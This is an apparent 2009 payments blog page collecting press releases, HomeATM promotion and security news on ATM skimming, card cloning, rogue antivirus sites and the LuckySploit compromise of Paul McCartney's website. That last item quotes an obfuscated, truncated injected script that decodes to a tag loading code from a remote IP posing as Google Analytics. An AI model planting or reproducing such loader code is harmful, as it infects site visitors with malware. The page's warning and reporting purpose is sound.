Acculynk Claims Consumers Like Their Solution

Editor's Note:  This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers.  After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live, within a month, an FTP site will arise with it's user's PAN and PIN numbers.  I One-Hundred-Percent (100%) guarantee it."  - kgm - Chairman/CEO - HomeATM ePayment Solutions

To read a White Paper comparison on "Hardware vs. Software" Security Click the Picture Above Left (PIN Debit Payment PDF) and it will open.  Here's Acculynk's Press Release:

Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research (www.javelinstrategy.com) study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.

According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.


“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”

Key Findings From the Custom Survey:

•   93% of survey participants found PaySecure easy to use, with 88% stating they understood that the PaySecure PIN-pad scrambles the number pad to increase the security of their transaction.
•   89% of participants like the fact they would pay directly on the merchant’s website without being redirected, and 86% like that PaySecure does not require additional passwords, log-ins or one-time use numbers.
•   78% agreed that entering their PIN on the PaySecure PIN-pad was similar to and as simple as entering their PIN at the ATM or grocery store.
•   79% of participants would feel more secure using their debit card online with a PIN than using their debit card without a PIN.
•   64% of participants would use PaySecure for all of their online debit card transactions if asked by their merchant to do so.
•   63% of participants would prefer to pay with PaySecure than pay using PayPal.

Methodology

The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit www.javelinstrategy.com/research or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit www.acculynk.com.

About PULSE

PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit www.pulsenetwork.com.
Contacts

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director
k.mccabe@javelinstrategy.com

Permalink: http://www.businesswire.com/news/google/20090408005322/en

Acculynk, HomeATM, PIN Debit, Internet PIN Debit, Pulse, Javelin Research

Related articles

• PIN on PED vs. PIN on the Web (pindebit.blogspot.com)
• Where's the PIN Offset?  PIN Payments News Blog
• It Doesn't Exist...Figment of the PIN-agination!
• Acculynk Most Closely Mimics Grocery Store Experience? (pindebit.blogspot.com)
• IBM Agrees with HomeATM...Hardware Required (pindebit.blogspot.com)
• 30% Chance IT WON"T get Hacked? (pindebit.blogspot.com)
• Online Theft Doubles...Fastenating! (pindebit.blogspot.com)
• Acculynk and Pulse Agree to Pilot (pindebit.blogspot.com)
• Chase Paymentech Predicts: PIN Debit Ubiquitous on Web by 2012 (pindebit.blogspot.com)

82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article

U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are have a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.

Continue Reading

ATM Skimming Victims Lose $50K (Video)

wgrz.com | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorneys Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your pin number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and pin numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.

Continue Reading

ATM Skimming, Card Skimming, Skimming Device

Paul McCartney Website LuckySploited

Source: scmagazineus:Complete item: http://www.scmagazineus.com/Paul-McCartneys-website-hacked-to-distribute-malware/article/130330/

Description:
The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to NoVirusThanks.org, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment.

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.


Related:

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual insasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

 var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Source: E-Secure-IT
https://www.e-secure-it.com

Related articles

• McCartney's Magical Mystery Malware Tour (daniweb.com)
• Paul McCartney and Ringo Starr Reunite Onstage at New York Benefit (idiomag.com)
• Beatles Re-Unite (idiomag.com)
• Digitally remastered Beatles albums set for fall release (cbc.ca)

HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider

FOR IMMEDIATE RELEASE

PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to it's customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.

When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike, to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at www.HomeATMBlog.com

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device.  Employing Tripe DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the users card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: www.HomeATMBlog.com or contact Mitchell Cobrin, COO mcobrin@HomeATM.net

# # #

HomeATM, Safe-T-PIN, 3DES, DUKPT, Secure, PIN Debit, Money Transfer, Press Release

Related articles by Zemanta

• HomeATM Receives First Ever Internet PCI 2.0 PED Certification (pindebit.blogspot.com)
• BSMS - Both Sides of the Mouth Syndrome (pindebit.blogspot.com)
• Updated: Acculynk...Where's the PIN Offset? My Pet PVV (pindebit.blogspot.com)
• Who Needs an Ounce of Prevention...We Have 10 pounds of Cure! (pindebit.blogspot.com)

Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News

Rogue security software now a top threat
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note:  I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% percent over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software.”

He said the security industry needs combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:

TheGreatSecurity.com  is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greated by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

    "The page at http://TheGreatSecurity.com says:   Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC" or     "http://TheGreatSecurity.com says:  Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." TheGreatSecurity.com is a malicious website, and should therefore be blocked using the HOSTS file.

WWWMobileReads.com is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. WWWMobileReads.com provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

    "The page at http://WWWMobileReads.com says:      Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"  or      "http://WWWMobileReads com says:      Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." MobileReads.com is a malicious website and should therefore be blocked using the HOSTS file.

JBF

Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item: http://i.gizmodo.com/5202776/attack-of-the-card-skimmers-its-happening-right-here-right-now

Description:
Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.

HomeATM in the News

Click the Graphic on the Left
to Read About HomeATM in the latest edition of ATM&Debit News

HomeATM's PCI 2.0 PED Certification Provides the following benefits:

Card Present Rates in a Card Not Present World!

"TRUE" PIN Debit Interchange Rates!

Dual Authenticaton!

15 Times More Convenient than Typing in 14-16 Card Number Digits, Expiration Dates and CVV Codes!

Effectively Removes Internet Retailers from the Scope of PCI DSS Potentially Saving Them 100's of Thousands of Dollars!  (Same with Financial Institutions, only they could save million$)

End to End Encryption |Triple DES | DUKPT Key Management | Security

Exponentially Advanced Log-In, Authentication Platform for Online Banking!

Related articles

• Updated: Acculynk...Where's the PIN Offset? My Pet PVV (pindebit.blogspot.com)
• HomeATM Prevents Cloned Bank Site Threat! (pindebit.blogspot.com)
• Hacked! Is Visa Next? (pindebit.blogspot.com)
• Make the "Hack You" Link... (pindebit.blogspot.com)
• Online Theft Doubles...Fastenating! (pindebit.blogspot.com)
• HomeATM at the (Security) Summit! (pindebit.blogspot.com)
• HomeATM Featured in American Banker (pindebit.blogspot.com)

Home(r)ATM Would Eliminate Cloning Altogether!

In this ISR News post, it is reported that Credit Card Cloners Stole 3.5 million.

In a nutshell, that's 3.5 Million reasons for using HomeATM's SafeTPIN device.   Without the PIN, a cloned card would be useless.  So would DNS hijacking (redirecting you to a cloned website).  No username/password, instead Swipe your Card, Enter your PIN.  They wouldn't receive the data...unlike the username/password, which they would receive.

In fact, cloning wouldn't be an "issue" (pun intended) at all, if online merchants employed the HomeATM True PIN Debit solution. 

Come to think of it neither would the over exorbitant "Card Not Present" rates...oh...and an end-to-end encryption methodology is certainly an added benefit.  Don't let me forget convenience.  If I can swipe my card 14-16 times faster than entering 14-16 digits from my credit or debit card, then I consider it to be 14-16 times more convenient.  You?  And yes, we do credit...and yes...it would be at "card present" credit card rates.  Any questions?

ISR News: Credit Card Cloners Steal £3.5m
April 7, 2009 by ADMIN

Excerpts From Finextra.com

A gang of five fraudsters who ran a global credit card cloning ring out of a London flat stole £3.5 million in just a few days, a court heard yesterday.

Prosecutor Ben Fitzgerald told Southwark crown court that police found fake cards and counterfeiting technology in the London flat.

The accused allegedly went on a spree between 28 September and 8 October last year as Barclaycard migrated cardholders from the Goldfish credit card business it acquired from Discover Financial Services earlier in the year.

Computer software found in the flat was used to make fake cards before the gang stole £3.5 million, with £645,000 spent on the cards in Britain alone, the court heard.

Khi-San Voong, 46, Qiu Yeu, 46, Qiang Xue, 34, and Dauy Chung, 40, all of Walworth, deny conspiracy to defraud. Cai Caixa, 27, pleaded guilty.

The trial continues...

credit card cloning, card present, card not present, true pin debit

I Have a Present For You! And a Card!

Card Present vs. Card Not Present

Before you accuse me of luring you to this post with the promise of a "present" and a "card" simply fill out the poll on the right and send me your email and shipping address. You'll get your "card present" enabling SAFETPIN device for free. Take a look at the right sidebar or above for more details.

A recent post by Ed Kountz at the Forrester Blog which made me realize that one of the biggest impacts of a utilizing a hardware vs. software device is simply this. Interchange.

HomeATM is the only company in the world which can provide e-tailers with a PCI 2.0 PED and thus "card present" TRUE PIN Debit rates. Why do I say true? Because our transactions are conducted in the same manner as a traditional retail location.

In addition, because our device is "ALREADY" PCI 2.0 PED certified, and employs DUKPT key management, we would effectively remove e-tailers from the scope of PCI DSS as no cardholder data is transmitted during the transaction.

Once the consumer has our low cost device, they become a "card present" buyer. They swipe their card, they enter their PIN and therefore the e-merchant benefits from not only dual-authentication, but also benefit from significantly lower interchange fees.

Example:

$200 order at Amazon. Card Not Present Rate: 2% + .25 cents = $4.25
$200 order at Amazon Card Present/ PIN Authenticated: = .75 cents. Savings = $3.50 (In this example an 88% savings!)

Now, add security, (PCI 2.0 PED) add convenience (isn't swiping the card 14 to 16 times faster than typing in your 14-16 digit card number?) deduct chargebacks, add familiarity (don't you swipe your card in the store) and our SafeTPIN s a compelling value proposition.

On the flip side, a software based PIN Debit application would still be a "card not present" transaction. The CNP PIN rate doesn't exist, but the EFT networks could create one. Of course, it will be exorbitantly higher than a Card Present PIN transaction. Remember when transactions were done with the device pictured on the left? Well unlike that device, HomeATM's SAFETPIN is built for the long run...and provides safer, more secure and thus lower rates.

So at the end of the day, our device (which is also EMV ready) is built with both the consumers, banks and merchants in mind. A software application is built with only the EFT Switches in mind. So it's no wonder the EFT switches are backing it. It's like Microsoft paying people to use Live Search with their Cashback program. The EFT switches are getting paid to push a software application. But what will be the public's uptake? And where's the benefit to the merchants? A tiny savings on Interchange...in exchange for a higher risk of liability in the instance of a breach? It's all interesting. I would think that the merchants would want a bigger savings and less risk, which is what HomeATM's PCI 2.0 PED provides. Wouldn't you? We'll see...

Here's the article showing the pent up frustration with Interchange Fees from the NRF, the NGA and NACCS. (The Big 3) They are all bricks and mortar organizations and are still throwing a fit about Interchange Rates. When will the Internet Retailer 500 band together and start demanding that they at least be afforded the opportunity to enjoy the rates the "Big 3" are unhapppy with.

Transacting Value: The Impact of Credit Industry Challenges on Card Marketing
Ed Kountz - April 6th 2009

Early on in this blog, I predicted that 2009 would see an increase in the number and stridency of calls for reforms to the U.S. credit card market, particularly in terms of types and amounts of acceptable fees. The Federal Reserve’s December 2008 card industry changes certainly made clear that this was happening. But now, the long-simmering brew appears to be spreading.

Two recent events serve to validate the premise:

--The National Retail Federation (NRF), the National Grocers Association (NGA) NACCS Angle Against Interchange. Recently, the NRF, NGA and NACCS -- together, the big three of retail associations -- recently held what their release billed as a “telephonic press conference” announcing the creation of “unfaircreditcardfees.com,” as well as an associated public interest campaign, to encourage consumers to press legislators for reforms to the “unfair and hidden credit card fees called “interchange””. This approach muddles the issue, in my opinion, as it uses language that ties the interchange dispute to consumers’ raw emotions at the account-fee issue, without identifying the (basic but relevant) differences in those topics. Whatever the ultimate impact, the directness of the appeal is impossible to miss.

--Senate Banking Committee Approves Card Reforms. On March 31, the Senate Banking Committee gave one-vote approval to measures designed to rein in certain credit card industry practices. The bill would include most of the Federal Reserve Rule changes passed in December, such as bans to universal default and double cycle billing, but would add fee restrictions and protections for borrowers under 21. Bill sponsor Chris Dodd said he was going to work over the recess to garner “broad support” for the effort.

As recent delinquency trends suggest, economic conditions continue to impact credit card usage and growth at a macro level. But increased scrutiny of long-held credit card industry practices will add additional pressure to an industry already feeling the strains.

Continue Reading at the Forrester Blog for eBusiness & Chennel Strategy Profressionals

PIN Debit, PCI 2.0, PCI DSS, NACS, NRF, Forrester Research, card present, card not present

Related articles by Zemanta

• BSMS - Both Sides of the Mouth Syndrome (pindebit.blogspot.com)
• Interchange Fees Going Up (pindebit.blogspot.com)
• Congress Asked to Lower Credit Card Fees (pindebit.blogspot.com)
• HomeATM Receives First Ever Internet PCI 2.0 PED Certification (pindebit.blogspot.com)

ID Cards Could Be Fitted with Chip and PIN Technology to Combat Fraud

The Press Association: ID cards 'could use chip and pin'

ID cards could be fitted with chip and pin technology to help combat identity fraud. The head of the Government agency tasked with producing the cards said there were no "technical obstacles" to adding chips to the cards and handing out pin numbers. James Hall, chief executive of the Identity and Passport Service said adding chips might allow the cards to be used in ATM machines in the future.

Officials are also looking at chip and pin as a possible way to help combat online fraud and help protect internet shoppers.

It also emerged the Home Office has issued half as many ID cards for foreign nationals in the first four months than expected.

When the card was launched in late November ministers predicted that between 40,000 and 50,000 non-EU nationals would have cards by the end of last month. But by the end of last week 22,500 cards had been issued. Mr Hall said they had encountered "the odd wrinkle" in the system but overall it had worked "pretty well".

A spokesman for the UK Border Agency (UKBA) said 42,000 foreign nationals had been through the enrollment process and had their biometric details taken. Mr Hall said he was looking at how ID card holders could "assert their identities" online when the card is rolled out.

He said: "One of the reasons for the format of the card is we have the opportunity to put it in to card readers and potentially use it in existing networks such as the ATM network.

One of the issues on the table is whether we should introduce chip and pin technology in to the card. There are no technical reasons why we couldn't do that." Editor's Note: In fact, HomeATM's SAFETPIN is EMV ready (smart card, chip ready) Which brings up a question. How would a software PIN Debit application work in an EMV environment? If you know, comment below...lol!

Related articles

• BSMS - Both Sides of the Mouth Syndrome (pindebit.blogspot.com)

SizzleMoney Offers Mobile Banking to Immigrants

I blogged about SizzleMoney about a week ago, but here's an excerpt from a good article in this morning's American Banker...

Prepaid Account Offers Mobile Banking Service to Immigrants

By Will Hernandez
American Banker | Tuesday, April 7, 2009

Denarii Payments Inc. of Atlanta has developed a mobile phone-linked prepaid product called SizzleMoney that is initially targeting Hispanic immigrants.

People can use the product to send one another money by text message, access funds in their SizzleMoney accounts with a prepaid debit card and make purchases at the point of sale with their phones.

"It's basically mobile cash," said Donald Baggett, Denarii's founder and chief executive officer.

Denarii said SizzleMoney will appeal to immigrants, who often use their mobile phones as their primary method of communication.

The SizzleMoney account features debit cards bearing the logos of the Maestro, Pulse, Star and Cirrus debit networks. The cards can be used to make PIN debit purchases and to make withdrawals at automated teller machines. Customers can upgrade to MasterCard Inc.-branded debit cards.

Central National Bank of Enid, Okla., issues the cards and its Interactive Transaction Services subsidiary processes the transactions.

Continue Reading at American Banker

Will Hernandez is the associate editor of ATM&Debit News.

Related articles by Zemanta

• HomeATM Featured in American Banker (pindebit.blogspot.com)
• Chase Paymentech Predicts: PIN Debit Ubiquitous on Web by 2012 (pindebit.blogspot.com)

NACHA - 18.2 Billion ACH Payments in 2008

ACH Transaction Volume up by 1.2 Billion Payments - Despite Economic and Industry Pressures

Consumer ACH Bill Payments Made via Internet near $1 Trillion

Orlando Florida: PIN Payments News: The number of ACH payments in 2008 topped 18.2 billion, representing an increase of 1.2 billion over 2007, according to statistics released today by NACHA - The Electronic Payments Association at its PAYMENTS 2009 conference.

"Consumers, businesses, and government are continuing to embrace the safe, smart, and green attributes of ACH payments and choosing electronic over paper," said Janet O. Estep, NACHA president and chief executive officer. "Despite the overall economy slowing in 2008, the ACH Network continues to see positive growth."

The portion of ACH payment volume passing through the ACH Operators grew in 2008 to nearly 15 billion transactions. The number of ACH Network transactions in 2008 was 14,960,689,587, which is 7.1 percent more than 2007. The dollar value of these payments was $29.96 trillion, an increase of 4 percent over 2007.

Internet Payments

Internet-initiated ACH debits (WEB) experienced robust growth in 2008, increasing by 19.7 percent to almost 2.1 billion payments. When combined with consumer-initiated credit payments (CIE), the dollar value of consumer ACH payments made via the Internet is nearing $1 trillion annually ($939 billion in 2008).

Business-to-Business (B2B) Payments/Financial EDI

More than 1 billion EDI-formatted addenda records were transmitted across the ACH Network in 2008, a 14.6 percent increase over 2007. Businesses use EDI-formatted addenda records to send and receive invoice- and other payment-related information. The volume of CTX payments, which can carry up to 9,999 addenda records, increased by 16.1 percent, and the number of CCD payments carrying an addenda record increased by 17.9 percent.

Back Office Conversion (BOC)

In its first full year of availability, the newest e-check transaction - BOC - grew by 1,772 percent in 2008 to a total of 78,460,461 payments. This volume is comparable to the original Point-of-Purchase (POP) check conversion application when accounting for the significant decline in consumer check-writing over the past eight years. At the same time period after its introduction, the annualized volume of POP transactions was 101 million; however, consumer check-writing has been declining during this time period by about 4 percent per year.

Federal Government Payments

The Federal government used the ACH Network for more than 30 million Direct Deposits as part of 2008's economic stimulus package. This contributed to an overall growth of Federal government ACH payments of 10.2 percent, to 1,145,895,074 payments in 2008. According to the Financial Management Service, the Federal government saves $0.925 for every Direct Deposit that replaces a check payment. With over 1 billion Direct Deposits, the Federal government saved at least $925 million in 2008 by using the ACH Network.

Network Risk and Quality Indicators

The most significant ACH Network risk and quality indicators improved moderately in 2008. Overall, the rate at which ACH debits are returned as unauthorized declined slightly from 0.041 percent to 0.040 percent, and there were no SEC codes that had a significant increase in its unauthorized rate.

NACHA -- The Electronic Payments Association

NACHA -- The Electronic Payments Association is a not-for-profit association that oversees the Automated Clearing House (ACH) Network, a safe, efficient, green, and high-quality payment system. More than 15,000 depository financial institutions originated and received 18.2 billion ACH payments in 2008. NACHA is responsible for the administration, development, and enforcement of the NACHA Operating Rules and sound risk management practices for the ACH Network. Through its industry councils and forums, NACHA brings together hundreds of payments system stakeholder organizations to encourage the efficient utilization of the ACH Network and develop new ways to use the Network to benefit its diverse set of participants. NACHA represents nearly 11,000 financial institutions through direct membership and 19 regional payments associations. NACHA and its members provide education, tools, and resources to increase the adoption of ACH payments to benefit businesses, consumers, and governments. To learn more, visit www.nacha.org and www.electronicpayments.org.

SOURCE: NACHA

NACHA, PIN Payments News Blog

Related articles

• 30% Chance IT WON"T get Hacked? (pindebit.blogspot.com)

Online Banking in Ireland Soars

Source: Finextra
Complete item: http://www.finextra.com/fullstory.asp?id=19891

Description:

The popularity of online banking in Ireland has soared over the last year, with 2.2 million customers now registered, a 28% increase on the previous year. According to data gathered from financial institutions by the Irish Banking Federation (IBF) and Irish Payment Services Organisation (Ipso), 2.2 million customers were registered for online banking by the end of 2008, up 27.8% on the 1.8 million recorded at the end of 2007. Ireland has a population of around 4.4 million.

In addition, there was a 31.6% rise in the number of Internet payments to 30.7 million - equivalent to 84,000 per day. A 33.6% increase, to 123 million, was also recorded in the number of times customers accessed their account balances online.

Pat Farrell, CEO, IBF, says: "We can see from the data compiled to date that online banking is on a significant growth path in Ireland. Comparative figures for 2007 show that the average user here made 14% more online payments and 20% more online enquiries than his/her UK counterpart. However, in a leading online adopter like Norway the average customer made around three times more payments online - indicating that there is considerable scope for further growth."

Una Dillon, head, card services and communications, Ipso, adds: "Online banking is facilitating the migration from cheques and other paper-based payment methods to electronic payments. The move to electronic payments is vital in ensuring Ireland's competitiveness and efficiency within the wider European market."

Related articles

• Hackers swarm bank accounts (comsecllc.blogspot.com)
• Citigroup Chairman: Bankers Being 'Vilified' (abcnews.go.com)

Link2Gov for Professional Crastination

Link2Gov: A Procrastinating Federal Taxpayer’s Best Friend

Federal balance-due tax payments accepted at PAY1040.com, BML.PAY1040.com and businesstaxpayment.com

MILWAUKEE--(BUSINESS WIRE)--Link2Gov Corp., a Metavante (NYSE:MV) company and IRS-authorized payment processor since 2003, today is reminding individuals and businesses of their secure, convenient and reliable electronic payment options for settling-up with Uncle Sam before midnight on April 15 — the federal tax deadline. Taxpayers can beat the clock with an electronic payment initiated at any of Link2Gov’s payment portals: www.PAY1040.com, 1-888-PAY-1040 and www.businesstaxpayment.com. Taxpayers with questions about the payment services can reach Link2Gov customer service agents at 1-866-658-5465.

